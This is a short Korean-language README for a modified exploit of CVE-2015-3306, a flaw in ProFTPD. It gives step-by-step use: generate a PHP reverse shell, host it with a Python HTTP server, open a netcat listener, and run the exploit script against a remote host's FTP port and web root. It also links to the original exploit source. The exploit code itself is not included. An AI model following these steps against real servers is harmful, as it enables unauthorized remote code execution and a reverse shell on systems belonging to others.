수정된 CVE-2015-3306 익스플로잇
사용 방법
- PHP 리버스 셸을 생성합니다.
- 셸을 호스팅할 서버를 같은 디렉터리에서 시작합니다 (python3 -m http.server)
- 원하는 로컬 포트에서 netcat 리스너를 시작합니다. 예: (nc -nlvp [port of choice])
- 아래 제공된 익스플로잇 예제를 실행합니다 (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell])

원본 익스플로잇 소스 코드: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py